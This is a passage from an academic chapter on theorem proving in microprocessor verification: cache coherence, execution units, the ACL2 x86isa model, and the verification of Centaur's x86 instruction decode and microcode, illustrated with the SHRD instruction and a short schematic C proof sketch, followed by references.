access or update of the relevant memory location. This simplistic formalization is a
high-level view of the ISA that is consistent with the programmer’s expectation of
the microprocessor functionality. On the other hand, this means that there is proof
obligation to ensure that the memory systems developed in modern microprocessors
indeed implement the abstraction provided by the ISA.
Consider a multiprocessor system in which each processor has access to
private L1 and L2 caches. An obvious problem for such systems is cache coherence,
i.e., making sure that a read from a private cache returns the same data
as if the processor had read it (atomically) from the main memory.
Concretely, consider the following simple memory system, which we call memory.
The transition function of memory, memory.next, is shown in pseudocode in
Fig. 4.
Verification of a multiprocessor system with cache entails showing a corre-
spondence between the executions of the microarchitectural model with the simple
memory system discussed above. Architecturally, cache coherence is ensured by a
protocol that allows a memory block to be loaded in the cache either (1) in read-
only mode, in which case no private cache is allowed to have a writable copy of
the block, or (2) in read-write mode, in which case only one private cache has
(exclusive) access to the block and no other private cache would have a copy of the
block. Unfortunately, these protocols tend to be highly complex. Indeed, verification
of cache coherence protocols is an extremely active area of research with several
interesting approaches.
Theorem proving has played an active role in the verification of cache coherence.
A key advantage of theorem proving in the verification of such protocols has been
the ability to exploit the full power of formal mathematics and logic to deal with
infinite state spaces. The lemmas and proofs so obtained exactly show the invariants
of the verified protocols and why the invariants hold. In contrast, algorithmic
methods typically account for a small (finite) instance of the protocol, e.g., a
system with (say) 4 processes. Nevertheless, the challenge in applying theorem
proving to memory protocols has been to come up with invariants. There have been two key
directions to address this problem. In one direction, there have been ways to improve
the automation of invariant discovery itself. This has resulted in a rich area of
predicate abstraction (Graf and Saidi 1997; Lahiri et al. 2003; Ray and Sumners
2007). The key idea is to start with a set of predicates and apply the state transition
of the system to identify how the predicate changes. For example, if one predicate
specifies the property that a specific cache line is invalid, then a read request would
cause the predicate to go from false to true. One can correspondingly develop an
abstract state graph of the system which can be finite even if the target system one
started with was unbounded. Another direction of research has been to formalize
the protocols themselves in a different way to enable easy capture of invariants. For
instance, instead of formalizing the state transition, the system can be formalized in
terms of flows (Talupur et al. 2015).
Execution Units
The design of execution units, which include ALUs that implement integer,
cryptographic, and floating-point operations, is datapath intensive. The verification
of execution units entails proving the correctness of micro-operations or uops
implemented in these units. The cost of undetected bugs in execution units can be
enormous–Intel’s FDIV “flaw” (Pratt 1995) is just one (in)famous example. It is
difficult for random or even targeted simulations to achieve complete verification
coverage for such designs. Additionally, the state space for such operations has
increased over the years–for instance, x86’s AVX512 instructions can have two or
more 512-bit wide operands.
Theorem proving has been extensively used for verification of a variety of
floating-point algorithms as well as their RTL implementations. ACL2 has been
used for verifying floating-point units of AMD's K5™ and K7™ processors
(Moore et al. 1998; Russinoff 1998). In addition to the verification itself, this
resulted in one of the most extensive formal treatments of computer arithmetic in
the logic of a theorem prover (Russinoff 2018).
Many execution unit operations are verified using symbolic simulation–i.e., both
the design and the specification are symbolically simulated on the same inputs,
and then their resulting outputs are compared for equivalence. The good news is
that modern off-the-shelf commercial model checkers and SAT solvers can achieve
complete coverage of many fixed-cycle operations–indeed, verification of these
operations can proceed automatically once the properties have been written (Pouarz
and Agrawal 2016; Mukherjee et al. 2015, 2016). However, complex operations
like multiplication (integer as well as floating-point), floating-point addition, fused
multiply-addition, division, and square root still require human assistance for a
variety of reasons.
One effective strategy has been to use the theorem prover to decompose such
verification problems into smaller proof
obligations (Swords and Davis 2011; Davis et al. 2014; Kaivola and Kohatsu 2003).
This approach leverages the benefits of both interactive and automated verification
techniques. Moreover, in case of decompositions, the theorem prover can be used
to compose together all the individual cases–proved either by symbolic simulation
inside the prover or with an automated tool–to make sure that there are no holes in
coverage.
Deep Dive: Formalization and Analysis of (Simplified) x86
We now describe an ACL2 library called x86isa (Goel 2016) that models a subset
of the x86 Instruction Set Architecture. This x86isa model is intended to provide
a mathematical description of the x86 architecture at the same level of discourse
as is found in the official Intel® Software Developer’s manuals (Intel SDMs) (Intel
Corporation 2020). Thus, it is a specification of the x86 ISA in the sense that it
formalizes the expected observable behavior of an x86 processor. One can view
x86isa as a simulator that can perform concrete as well as symbolic execution of
x86 instructions, the latter of which is a crucial step toward general-purpose property
verification. As such, this model can be used in a variety of projects in the fields of
software, hardware, and compiler verification.
In this section, we discuss the design of x86isa and focus on some aspects
that enable its role as a formal specification for x86 microarchitecture. We also
discuss how this model can be used to test and verify properties of microarchitecture
components by describing a recent application of x86isa toward verifying Centaur
Technology’s x86 instruction implementations (Goel et al. 2020, 2021; Goel and
Sumners 2019). The goal here is to use x86isa as a case study to give the reader
some insight into the development of models that are used for formal verification
and to provide an overview of their general capabilities and limitations.
Approach
The x86isa model specifies the x86 ISA in a manner described earlier in
Section “ISA Analysis”–the behavior of the machine is captured by an interpreter
(i.e., an ISA.run function) that operates over the machine state. This interpreter
essentially models the fetch-decode-execute cycle of an x86 processor.
The four core components of x86isa are the following:
Machine State: The machine state is modeled using a stobj whose fields describe
the basic execution environment of an x86 processor (ref. Figure 3-2: 64-Bit Mode
Execution Environment, Chapter 3, Intel SDMs). As of this writing, it contains the
program counter, general-purpose registers, flags registers, floating-point registers,
XMM/YMM/ZMM registers, segment registers, system table registers, control and
debug registers, model-specific registers, and a memory model. Additionally, the
machine state contains some fields that are an artifact of the model and not of the
x86 architecture–the purpose of these fields is to store information about the model’s
operation. For example, if any unimplemented x86 operation is encountered, then a
special field called the model status is populated with appropriate information.
Step Function: The step function models a single step in the processor’s execution,
i.e., one fetch-decode-execute cycle. It takes an initial machine state as input and
returns an updated state. The program counter contains the memory address of the
instruction to be executed next; this instruction is fetched from the memory and if
the fetch is successful, it is decoded. Then, control is dispatched to the appropriate
instruction semantic function, which updates the machine state with the final effects
of that instruction. If, at any point, an error is encountered, execution halts, and the
model status field is also populated with an informative error message.
Run Function: The run function is the x86 ISA interpreter. It takes n, the number
of steps to be executed, and the initial machine state as inputs, and executes the step
function n times or until an error or a halt instruction is encountered, whichever
comes first. It returns the updated machine state.
Instruction Semantic Functions: Each supported instruction has a semantic function
that captures its effects on the machine state; the step function dispatches to these
functions once an instruction has been fetched and decoded.
The first step needed to simulate an x86 machine program on x86isa is
to initialize the model state appropriately–i.e., store that program in the model’s
memory, populate the program counter, registers, and other memory locations, if
necessary. Then, the run function is called. The final effects of the program can
be observed by comparing the resulting machine state with the starting state. The
contents of the machine state can be observed at any desired level of granularity–
either after the execution of each instruction or a set of instructions, or at certain
breakpoints, or when the run function terminates.
The values used to initialize the model state can either be concrete or symbolic.
Concrete values are used when the model is used as an ISA simulator, and symbolic
values are used when the model is used to perform formal analysis. Symbolic values
allow the consideration of many, if not all, possible executions at the same time.
Even parts of the program can be symbolic!
Design Considerations
A useful specification should describe the behavior of the system it models in a
way that is easy to understand; this description should be an accurate representation
of the system. Additionally, it is helpful if specifications are accompanied by tools
that facilitate their use as verification frameworks and simulators. The design and
development of a specification can be done deliberately with these goals in mind.
The primary purpose of x86isa is to provide a mathematical specification of
the x86 ISA that is suitable for use in formal analyses. We discuss how the x86isa
library incorporates these goals and the role ACL2 plays toward achieving them.
Easy to Understand: In this project, the x86 ISA specification is simply exe-
cutable code written in ACL2's programming language. The executable
nature alone goes a long way toward achieving this goal: one can simply run x86isa
to observe what it does. Additionally, the code is documented, with both user- and
developer-oriented topics accessible online (x86isa: Documentation 2022). The
sources which were consulted to write the specification functions are often cited
in the source code–these citations point to relevant lines from specific sections of
the Intel manuals. For many topics, the documentation is generated automatically
from the code, which keeps them synchronized with each other. In further support
of this goal, the specification functions are not optimized for execution efficiency
(see Goal “Unified Model for Simulation and Formal Verification:” for a discus-
sion regarding execution efficiency). Such optimizations can often complicate the
algorithm implemented by that code, which can not only make the code difficult
to comprehend but can also introduce bugs. As such, the specification functions
implement a simple, straightforward algorithm. The simplicity of the specification
functions is also what makes them amenable to be used in formal verification
efforts–that is, these functions offer reasoning efficiency. Often, if a function is easy
to understand, then it is easy to reason about.
Accurate: This goal is a little more difficult to address. How do we know that
x86isa models the x86 ISA accurately? After all, code can have bugs, due
to programming oversights or misunderstandings of the system being modeled.
Again, the simplicity of the specification functions helps–simpler code is easier
to review. However, the x86 ISA is a large and complex architecture, and code
reviews can only take us so far. Ideally, though the formal model is trusted, we
would like it to be tested as well. Another way to build confidence in the model’s
accuracy is by performing co-simulations–we compare the results of program runs
on x86isa with those on a real x86 processor. (In an industrial setting, co-
simulations can also be done against an internal “Golden Model”.) This immediately
raises an important point: if a formal model is validated using simulation, then any
mathematical guarantees provided by using the formal model eventually depend on
the guarantees offered by simulation. Why then is it worth using a formal model
and incurring the overhead of theorem proving in the first place? The answer lies
in separation of concerns. Formal models are designed for the express purpose
of being specifications of the system under verification–their development is free
from the pressures to optimize code for execution, and the focus is entirely on
capturing the system’s behavior. Thus, the reliance on simulation for the validation
of formal models is not as total as it may seem at first glance. Additionally, one
can use ACL2 to prove properties about the formal model itself. For instance,
one can prove noninterference theorems about specification functions that are not
supposed to conflict with each other. As such, running as many simulations as
possible is a beneficial exercise, and optimizing the specification functions for
execution efficiency can make this a practical one. However, as we discussed
earlier, supporting execution efficiency often comes at the expense of simplicity
and reasoning efficiency. The following solution to this issue will be familiar
by now: we can use ACL2 to prove that specification functions optimized for
reasoning efficiency implement the same behavior as those optimized for execution
efficiency, and thus, they can be used interchangeably. We simply use whichever
definition is suitable, depending on the context. As discussed in Section “ACL2
Preliminaries”, ACL2 provides many features that help in balancing this trade-
off between reasoning and execution efficiency in a practical manner; x86isa
heavily relies on features like MBE, guards, and stobjs. (We actually use an abstract
stobj in x86isa to model the machine state. Abstract stobjs are an advanced
ACL2 feature that use regular stobjs for concrete execution but allow an alternative
definition (proven to correspond to the underlying stobj whose logical definition
involves lists) to be used for reasoning.) To sum up, model validation can be effort-
intensive–it can not only involve simulation but also theorem proving, both of which
place inherently opposing demands on the model’s design. However, validation
is indispensable because it serves as evidence for the model’s accuracy, thereby
increasing confidence in the results of formal verification. This encourages adoption
of the formal model by people other than its developers.
Unified Model for Simulation and Formal Verification: The x86isa model
is accompanied by some tools that support its use as a simulator; these tools are
especially useful for model validation via concrete simulations. Dynamic program
instrumentation utilities allow monitoring the behavior of a running program in
a manner similar to the GNU Debugger and Intel’s Pin tool (Patil et al. 2004;
Intel). For instance, one can step through a program one instruction at a time,
conditionally or unconditionally trace reads from and writes to the machine state,
insert breakpoints, log (requested parts of) the machine state to a file, and so on. One
can even modify the program during its execution. We also have a binary program
(ELF and Mach-O formats) loader library (EXLD 2022) in ACL2 that can parse an
executable program file and load requested sections of it into the relevant addresses
of the x86isa’s memory. This speeds up machine state initialization, which is the
first step toward simulating a program on the model. This library also makes symbol
table information available directly in ACL2, which, among other things, allows a
user to instrument a machine code program by referring to subroutine names used
in the source code instead of memory addresses that can change the next time the
binary file is generated. The x86isa model is also accompanied by lemma libraries
that support symbolic simulation. These lemmas are organized in collections to
support various proof strategies that target different kinds of verification problems.
For instance, there are separate libraries that describe the interaction of reads and
writes at the level of both physical and virtual memory. Note that all of these utilities
for simulation and verification are written in ACL2 itself. An important advantage
of writing such utilities in the same language as the formal specification is that one
avoids any potential language-related cognitive dissonance issues that could cause
unpredictable behavior that is difficult to debug.
Extensible Design: The x86 ISA is extended quite regularly. For instance, Intel
maintains a document (Intel Corporation 2021) that describes features slated to be
present in future x86 processors. The formal model must be able to keep up with this
ever-expanding ISA design; adding a new feature must not incur an unreasonable
manual overhead. In order to facilitate that, formal models must embrace the
extensible design principle of software engineering. One way the x86isa model
follows this principle is in its description of x86 instructions. The model contains a
list, inst.lst, of all the instructions supported (or soon-to-be supported) by x86
processors. Each element of inst.lst is essentially a structure of product type
that describes an instruction’s encoding and lists the name of the ACL2 function
that captures its semantics. Some fields of this structure include the instruction's
mnemonic, its opcode, information about the arity and kinds of its operands, and the
name of its semantic function. Thus, adding support for a new instruction typically
involves two steps:
1. Writing and testing the semantic function that captures that instruction's behavior
2. Adding an appropriate instruction encoding entry, including the name of the
above function, in inst.lst
Scope
The x86isa library does not model the entirety of the x86 ISA. As of this writing,
only IA-32e and compatibility modes of operation are modeled in x86isa. Also,
it describes a single x86 core, and its memory model is sequentially consistent; as
such, x86isa cannot be used to analyze concurrent behaviors. It does not model
caches, translation look-aside buffers, exceptions and interrupts, and features like
power management, virtual machine (VMX), and software guard extensions (SGX).
Despite these limitations, x86isa can still be used to perform a variety of useful
analyses. For instance, x86isa can be used to do software verification–i.e., to
establish the correctness of x86 machine-code programs w.r.t. a specification; an
interested reader can refer to examples in this work (Goel 2016). The x86isa
library has also been used at Centaur Technology to establish that the logic design-
ers’ Verilog/SystemVerilog implementation for instruction decoding has the same
behavior as that of the x86isa’s decoder; more details are in Section “Application:
Verifying x86 Instruction Implementations”.
It should be noted that such missing features in x86isa are not due to
theoretical restrictions, but to a lack of time and other practical
considerations. We typically support an ISA feature only when we undertake a
verification project that requires a model of that feature.
Application: Verifying x86 Instruction Implementations
The portion of the design relevant to this verification effort consists of the
following blocks:
– decode block: This block decodes bytes in the instruction stream in order to
identify the x86 instruction. It is also responsible for detecting illegally encoded
instructions and identifying the appropriate exceptions to be raised. For example,
if an instruction is more than 15 bytes in length (the maximum allowed by the
x86 ISA), then the decode block prescribes the #GP (general-protection, interrupt
13) exception.
– xlate and ucode blocks: These blocks are responsible for the translation of a legal
x86 instruction, obtained from the decode block, into micro-operations or uops.
The xlate block translates an instruction to at most 6 prelude uops. There can also
be an optional trap to a microcode ROM in the ucode block. The ROM contains
a compressed version of the uops–also called ROM instructions–and these pass
through a sub-block called the microsequencer that translates a ROM instruction
into corresponding uops. All the uops, from xlate and ucode, that correspond to
a legal x86 instruction are collectively referred to as the ucode program.
– exec block: The exec block has the RTL implementations of uops. This block
may contain many different units–the ALU, for integer uops; the FPU, for
floating-point uops, etc.
(Figure [diagram not reproduced]: the verification framework. At the top sit the
ACL2 artifacts: inst.lst, the x86isa model (x86-decode, x86-exec), and the ucode
model (ucode-exec). Below them are the SV functions (sv-decode, sv-xlate, sv-ucode,
sv-exec), extracted via the ACL2/VL/SV toolchain from the RTL (in SystemVerilog)
blocks: decode, xlate, ucode, exec, and scheduler/load-store. The theorems
decode-correct, xlate/ucode-correct, and exec-correct relate the layers.)
The RTL design is translated into ACL2 using the VL and SV libraries, and the
resulting sv-decode, sv-xlate, sv-ucode,
and sv-exec ACL2 functions correspond to the decode, xlate, ucode, and exec
blocks, respectively. We note that VL and SV are trusted; i.e., we assume that these
tools have been implemented correctly.
Open-source ACL2 library GL (Swords 2010; Swords and Davis 2011) is used
for symbolic simulation. GL contains a prover that can verify ACL2 theorems
involving finite domains (e.g., bit-vectors of a particular width). This prover is
also verified in ACL2. GL symbolically simulates ACL2 function definitions to
reduce finite ACL2 theorems into propositional logic formulas. These propositional
logic formulas are then either proven using binary decision diagrams (BDDs) or
simplified using And-Inverter Graph (AIG) algorithms and sent to a SAT solver.
GL’s successor FGL (Swords 2020) can also be used for symbolic simulation–
FGL contains a sophisticated prover that can verify more general theorems than
GL because it incorporates term rewriting alongside bit-blasting using SAT solvers.
Ucode Model
Similar to how the x86isa model formally specifies the x86 instruction set
architecture, the ucode model formally specifies the microarchitecture. This model
is also defined by an interpreter that acts on the ucode state–the effects of each uop
are captured by the effects produced on the state by uop semantic functions. The
ucode state can be thought of as extending the x86isa state; it not only captures
the ISA state components but also the internal microarchitecture-specific registers,
flags, and memory banks.
The definition of the program counter in the ucode model deserves special
mention. Recall that the program counter of x86isa is simply the rip register;
it contains the address of the x86 instruction that the model is poised to execute.
Analogously, the program counter in the ucode model is a data structure that consists
of the prelude uops and, if applicable, an address in the microcode ROM–thus, the
program counter essentially contains a ucode program that corresponds to the x86
instruction that the ucode model is poised to execute. A uop is represented by a
product-type consisting of all the information needed to identify the uop–the uop’s
opcode, source and destination locations, immediate data, and so on. The value of
this program counter can be obtained by simulating the sv-xlate design function;
given a description of the x86 instruction, this function generates uops and, if needed,
a ROM trap address. More details are in Section “Verification of the Xlate/Ucode
Blocks”.
The ucode model begins execution by reading the first element in the program
counter. If it is a prelude uop, then its corresponding uop semantic function is
executed, after which that uop is removed from the program counter. Thus, unless
there are traps to the microcode ROM, the ucode model halts execution when there
are no uops left in the program counter. When a trap is present, the microcode ROM
is read to obtain the ROM instruction at that address, and then, the microsequencer
block is simulated, via the sv-ucode design functions, to get the corresponding
uops, which are then executed by calling their respective uop semantic functions, as
with prelude uops. A terminal ROM instruction (i.e., the last ROM instruction in a
ucode program) is tagged with a .T label, which signals to the ucode model that the
x86 instruction has run to completion and it then halts execution.
The uop semantic functions used in the ucode model are used to verify the
uop’s RTL implementations in the exec block–i.e., exec-correct theorem; this
is discussed in Section “Verification of the exec Block”. These functions are also
used in the proof of the xlate/ucode-correct–see Section “Verification of
the Xlate/Ucode Blocks”.
A Candidate Instruction
The first step involved in verifying an x86 instruction implementation is to pick the
instruction. This may sound obvious, but it is not a straightforward proposition. For
instance, using the mnemonic to identify a candidate instruction can be problematic–
the x86 ISA often has multiple variants for an instruction with the same mnemonic.
For example, the double-shift instruction SHRD corresponds to the variants listed
in Table 1; note that there are two separate opcodes, each of which describes six
distinct variants. Moreover, many instruction byte sequences can correspond to a
single variant–for instance, rex and operand-size override prefixes are ignored in
an instruction executing a byte operation; the instruction variants with and without
these prefixes are operationally the same. (We assume that these variants are of legal
length; specifically, adding these prefixes did not increase the length of the x86
instruction beyond the legal limit.) Additionally, there are multiple configuration
settings, like the operating mode of the processor, to take into account for each
variant.
The RTL implementation is a big factor in deciding how these variants are picked
for verification. For the decode block, the proofs of correctness of all the variants
that have the same opcode are usually grouped together. One may do additional
case-splits based on some RTL-specific internal parameters. For the xlate/ucode
blocks, a variant becomes a “stand-alone” verification target if it has exactly one
ucode program corresponding to it. For example, if SHRD r16, r16, imm8
and SHRD r32, r32, imm8 are implemented by the same sequence of uops,
then they are considered to be the same variant for the purposes of verifying these
blocks. An advantage of this choice over, say, grouping all the possible instruction
variants together is that the microcode program under verification will have only
data-driven control paths (e.g., an early exit if imm8 is zero) instead of control
paths dictated by a specific variant (e.g., jump to another block of uops for variant A
and yet another block for variant B, and so on.). This means that there will be fewer
case-splits during a proof, which not only speeds up verification but also makes it
more amenable to automation using techniques like bit-blasting.
We will illustrate our verification approach for the decode, xlate, and ucode
blocks by using a running example of the following SHRD variant. This instruction’s
destination and source are 64-bit registers whose indices are represented by
<dreg64> and <sreg64>; it also takes an immediate byte <imm8> to specify
the shift amount.
variant: SHRD <dreg64>, <sreg64>, <imm8>
bytes: 0x48 0x0F 0xAC 0b11<dreg64><sreg64> <imm8>
The byte 0x48 is the rex prefix, which indicates that this is a 64-bit operation. The
bytes 0x0F 0xAC represent the opcode. The byte 0b11<dreg64><sreg64>
represents the ModR/M, whose mod field is 0b11, which indicates that the r/m
field denotes a register operand. The r/m field is a 3-bit value <dreg64>, and the
reg field is a 3-bit value <sreg64>.
Our ACL2 specification function shrd-spec (from the x86isa model)
describes the behavior of this instruction. The semantics of this instruction variant
are as follows: the destination is shifted right by a value indicated by the given
immediate byte (masked by 0x3F) and the resulting empty bit positions are filled
with bits shifted in from the source (least-significant bit first). Though SHRD can
also affect the rflags register, we omit all flag-related discussions here.
Figure 7 shows an example of a concrete run of this instruction variant, and
Tables 2 and 3 show the corresponding uops that implement this variant, along with
a log of the computation performed by each uop for this particular concrete run.
— Initial Values —
RDX := 0x1122 3344 5566 7788 RCX := 0x0123 4567 89AB CDEF
— Final Values —
RDX := 0x1122 3344 5566 7788 RCX := 0x7788 0123 4567 89AB
Fig. 7 An example of a concrete run of SHRD RCX, RDX, 16: the destination register RCX is
shifted right by 16 and the low 16 bits of RDX are shifted in from the left. RDX remains unchanged
that can then be input to sv-decode to obtain the valid-instruction data structure.
For instance, the following indicates the relevant variant of the SHRD instruction of
our running example:
Mnemonic: SHRD Opcode: 0x0F_AC
Variant: Size := 64; OP1 := GPR
Mode: 64-bit mode
Symbolic: OP1, OP2, OP3
The first line is used to find the appropriate entry for SHRD in inst.lst,
which gives information about the arity and kinds of operands of this instruction.
The second line helps in picking the variant under verification by specifying the
operation width, 64, and by constraining the first operand to be a register (i.e.,
not a memory location). The third line picks the machine configuration, and the
fourth line instructs the framework to pick a symbolic value for the operands–the
register indices and the immediate byte. All of this information is used to populate
the instruction data structure.
This structure is then passed through sv-xlate and sv-ucode, and thus, one
obtains the ucode program which comprises the prelude uops (i.e., uops generated
by xlate) and the address of the ucode routine, if applicable. One can then attempt
to prove that all relevant executions of this ucode program implement the SHRD
instruction. That is, the effects produced by the instruction specification function
shrd-spec on the ISA-visible components of the ucode state are the same as
those produced by the implementation (i.e., uops’ execution), provided that the
arguments of shrd-spec correspond to the instruction’s operands. These kinds
of proofs can be done by techniques like the clock function approach, the step-
wise invariant method (Boyer and Moore 1996; Ray and Moore 2004; Ray et al.
2008), and decompilation-into-logic (Myreen et al. 2008; ACL2 Books: Codewalker
2014), all of which could employ either GL/SAT’s automatic bit-blasting or ACL2
rewriting. The central idea is the symbolic simulation of these uops on our ucode
model.
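The clock-function style of proof can be sketched schematically as follows. This is
our own illustration with hypothetical types and helper names (step, clock_fn,
project, isa_equal), not the actual ACL2 formalization.

#include <stdint.h>

/* Schematic form of the proof obligation: starting from a ucode state
   whose operands match the arguments of shrd-spec, running the ucode
   model for clock_fn(s) steps must leave the ISA-visible components
   equal to what the specification computes. All types and helpers
   here are hypothetical stand-ins. */
typedef struct { uint64_t gpr[16]; uint64_t rip; } isa_state;
typedef struct { isa_state isa; uint64_t internal[8]; } ucode_state;

extern ucode_state step(ucode_state s);     /* execute one uop          */
extern unsigned    clock_fn(ucode_state s); /* #steps until completion  */
extern isa_state   shrd_spec(isa_state s);  /* instruction semantics    */
extern int         isa_equal(isa_state a, isa_state b);

static isa_state project(ucode_state s) { return s.isa; } /* visible part */

int implements_shrd(ucode_state s) {
    ucode_state t = s;
    for (unsigned i = 0, n = clock_fn(s); i < n; i++)
        t = step(t);   /* symbolic simulation of the uops on the model */
    /* implementation and specification agree on ISA-visible state */
    return isa_equal(project(t), shrd_spec(project(s)));
}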
Note that being able to obtain the prelude uops and the trap address automatically
allows one to keep up with the constantly changing RTL. For nonmajor “everyday”
changes in the RTL (e.g., if the ROM addresses change or if the uops use different
internal registers), the proofs usually work without any intervention.
Discussion
The goals of this project are to verify the decode, translate, microsequencer,
and execution blocks. This project does not take load/store units, caches, register
mapping, scheduler, etc., into account, and, as such, offers no guarantees there. A
benefit of this approach is that it enables a divide-and-conquer strategy for verifying
instruction implementations. The verification of the decode block, the xlate/ucode
blocks, and the exec blocks can all be done independently of each other. Indeed, the
verification of the exec block has been done at Centaur regularly for over a decade,
and this project incorporated and extended all that work. Another benefit is that one
does not need to formally specify (or even understand) the xlate and ucode blocks–
one can simply symbolically simulate these units and reason about their outputs
(i.e., uops). This lends robustness to the process–design changes to those blocks
(apart from interface changes) do not impede formal verification.
Conclusion
Our focus in this chapter has been on architecture and microarchitecture assurance.
Of course, the scope of theorem proving goes far beyond that. A treatment of the
role of theorem proving in assurance of computing systems would be incomplete
without at least a passing mention of some of these topics.
References
Aagaard M, Cook B, Day N, Jones RB (2001) A framework for microprocessor correctness
statements. In: Margaria T, Melham TF (eds) Proceedings of the 11th International Conference
on Correct Hardware Design and Verification Methods (CHARME 2001). LNCS, vol 2144.
Springer, Scotland, pp 443–448
Aagaard MD, Jones RB, Kaivola R, Kohatsu KR, Seger CH (2000) Formal verification of iterative
algorithms in microprocessors. In: Proceedings of the 37th ACM/IEEE Design Automation
Conference (DAC 2000). ACM Press, Los Angeles, pp 201–206
ACL2 Books: Codewalker. Online; accessed: Feb 2022. Github, (2014) https://github.com/acl2/
acl2/tree/master/books/projects/codewalker
Arm ISA Specifications. Online. https://developer.arm.com/architectures/cpu-architecture/a-
profile/exploration-tools
Armstrong A, Bauereiss T, Campbell B, Reid A, Gray KE, Norton RM, Mundkur P, Wassell M,
French J, Pulte C, Flur S, Stark I, Krishnaswami N, Sewell P (2019) Isa semantics for armv8-a,
risc-v, and cheri-mips. Proc ACM Program Lang 3. pp 1–31, https://doi.org/10.1145/3290384
Bauereiss T, Campbell B, Sewell T, Armstrong A, Esswood L, Stark I, Barnes G, Watson
RNM, Sewell P (2021) Verified security for the morello capability-enhanced prototype arm
architecture. Technical Report UCAM-CL-TR-959, University of Cambridge, Computer
Laboratory
Bevier WR, Hunt WA Jr, Moore JS, Young WD (1989) Special issue on system verification. J
Autom Reason 5(4):409–530
Boyer RS, Kaufmann M, Moore JS (1995) The Boyer-Moore theorem prover and its interactive
enhancements. Comput Math Appl 29(2):27–62
Boyer RS, Moore JS (1996) Mechanized formal reasoning about programs and computing
machines. Automated reasoning and its applications: essays in honor of larry wos, pp 147–
176 . https://www.cs.utexas.edu/users/boyer/bm96.pdf
Boyer RS, Moore JS (2002) Single-threaded objects in ACL2. In: Krishnamurthy S, Ramakrishnan
CR (eds) Practical Aspects of Declarative Languages (PADL). LNCS, vol 2257. Springer,
pp 9–27
Boyer RS, Yu Y (1996) Automated proofs of object code for a widely used microprocessor. J
ACM 43(1):166–192. http://dl.acm.org/citation.cfm?id=227603
Bronstein A, Talcott TL (1990) Formal verification of pipelines based on string-functional
semantics. In: Claesen LJM (ed) Formal VLSI correctness verification. VLSI design methods
II, pp 349–366
Burch JR, Dill DL (1994) Automatic verification of pipelined microprocessor control. In: Dill DL
(ed) Proceedings of the 6th International Conference on Computer-Aided Verification (CAV
1994). LNCS, vol 818. Springer, pp 68–80
Chen YA, Bryant RE (1998) Verification of floating-point adders. In: International Conference on
Computer Aided Verification. Springer, pp 488–499
Church A, Kleene SC (1937) Formal definitions in the theory of ordinal numbers. Fundam Math
28:11–21
CLHS (Common Lisp HyperSpec) Online; accessed: 2022 http://www.lispworks.com/reference/
HyperSpec/index.html
Davis J, Slobodova A, Swords S (2014) Microcode verification–another piece of the microproces-
sor verification puzzle. In: International Conference on Interactive Theorem Proving. Springer,
pp 1–16
Degenbaev U (2012) Formal specification of the x86 instruction set architecture. Ph.D. thesis,
Universität des Saarlandes. http://rg-master.cs.uni-sb.de/publikationen/UD11.pdf
Dowek G, Felty A, Huet G, Paulin C, Werner B (1991) The coq proof assistant user guide version
5.6. Technical Report TR 134, INRIA
EXLD: ELF and Mach-O File Parser, Documentation. Online; accessed: 2022. https://www.cs.
utexas.edu/users/moore/acl2/manuals/current/manual/?topic=EXLD____EXECLOADER
Floyd R (1967) Assigning meanings to programs. In: Mathematical Aspects of Computer Science,
Proceedings of Symposia in Applied Mathematcs, vol XIX. American Mathematical Society,
Providence, pp 19–32
Fox A (2015) Improved tool support for machine-code decompilation in HOL4. In: International
Conference on Interactive Theorem Proving. Springer, pp 187–202
Goel S (2016) Formal verification of application and system programs based on a validated x86
ISA model. Ph.D. thesis, Department of Computer Science, The University of Texas at Austin.
https://repositories.lib.utexas.edu/handle/2152/46437
Goel S, Slobodova A, Sumners R, Swords S (2020) Verifying x86 instruction implementations.
In: Proceedings of the 9th ACM SIGPLAN International Conference on Certified Programs and
Proofs, CPP 2020. Association for Computing Machinery, New York, pp 47–60. https://doi.org/
10.1145/3372885.3373811
Goel S, Slobodova A, Sumners R, Swords S (2021) Balancing automation and control for formal
verification of microprocessors. In: Silva A, Leino KRM (eds) Computer Aided Verification.
Springer International Publishing, Cham pp 26–45
Goel S, Sumners R (2019) Using x86isa for microcode verification. In: SpISA 2021: Workshop
on Instruction Set Architecture Specification. https://www.cl.cam.ac.uk/~jrh13/spisa19/paper_
08.pdf
Goldstein HH, von Neumann J (1961) Planning and coding problems for an electronic computing
instrument. In: von Neumann J (ed) Collected Works, vol V. Pergamon Press, Oxford
Gordon MJC, Melham TF (eds) (1993) Introduction to HOL: a theorem-proving environment for
higher-order logic. Cambridge University Press, ISBN 0-521-44189-7. Journal of Functional
Programming, 4(4), pp 557–559. https://doi.org/10.1017/S0956796800001180
Graf S, Saidi H (1997) Construction of abstract state graphs with PVS. In: Grumberg O (ed)
Proceedings of the 9th International Conference on Computer-Aided Verification (CAV 1997).
LNCS, vol 1254. Springer, pp 72–83
Greve D, Wilding M, Hardin D (2000) High-speed, analyzable simulators. In: Kaufmann M,
Manolios P, Moore JS (eds) Computer-aided reasoning: ACL2 case studies, Kluwer Academic
Publishers, Boston, pp 89–106
Greve DA (1998) Symbolic simulation of the JEM1 microprocessor. In: Gopalakrishnan G,
Windley P (eds) Formal methods in computer-aided design. Lecture notes in computer science,
vol 1522. Springer, Berlin/Heidelberg, pp 321–333. https://doi.org/10.1007/3-540-49519-3_21
Greve DA, Kaufmann M, Manolios P, Moore JS, Ray S, Ruize-Reina JL, Sumners R, Vroon D,
Wilding M (2008) Efficient execution in an automated reasoning environment. J Funct Program
18(1):15–46
Harrison J (1999) A machine-checked theory of floating point arithmetic. In: International
Conference on Theorem Proving in Higher Order Logics. Springer, pp 113–130
He J, Hoare CAR, Fränzle M, Müller-Olm M, Olderog ER, Schenke M, Hansen MR, Ravn AP,
Rischel H (1994) Provably correct systems. In: International Symposium on Formal Techniques
in Real-Time and Fault-Tolerant Systems. Springer, pp 288–335
Hunt WA Jr (1989) Microprocessor design verification. J Autom Reason 5(4):429–460. http://www.
cs.utexas.edu/~boyer/ftp/cli-reports/048.pdf
Hunt WA Jr (1994) FM8501: a verified microprocessor. LNAI, vol 795. Lecture Notes in Artificial
Intelligence, Springer, ISBN: 9783540579601
Intel: Pin: A Dynamic Binary Instrumentation Tool. http://software.intel.com/en-us/articles/pin-a-
dynamic-binary-instrumentation-tool
Intel Corporation (2021) Intel® Architecture Instruction Set Extensions Programming Reference.
Online. Order Number: 319433-044. https://software.intel.com/en-us/articles/intel-sdm
Intel Corporation (2020) Intel® 64 and IA-32 Architectures Software Developer’s Manual
Combined Volumes: 1, 2A, 2B, 2C, 2D, 3A, 3B, 3C, 3D, and 4. Online. Order Number:
325462-072USs. https://software.intel.com/en-us/articles/intel-sdm
